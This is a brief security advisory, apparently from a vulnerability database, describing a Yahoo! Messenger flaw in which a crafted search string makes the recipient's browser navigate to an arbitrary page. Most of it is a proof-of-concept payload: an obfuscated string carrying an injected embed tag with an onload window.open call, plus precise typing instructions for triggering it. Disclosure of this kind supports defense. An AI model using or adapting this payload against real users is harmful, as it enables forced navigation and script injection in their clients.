|
|
Yahoo! Messenger Remote Search String Arbitrary Browser Navigation Vulnerability
An attacker can exploit this issue via standard networking tools or possibly by using another client application. The following examples are sufficient to trigger this issue: :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?( Note: "helomsg :" this space must be created with alt+0160 and this "s: " with a space. |
|
Privacy Statement |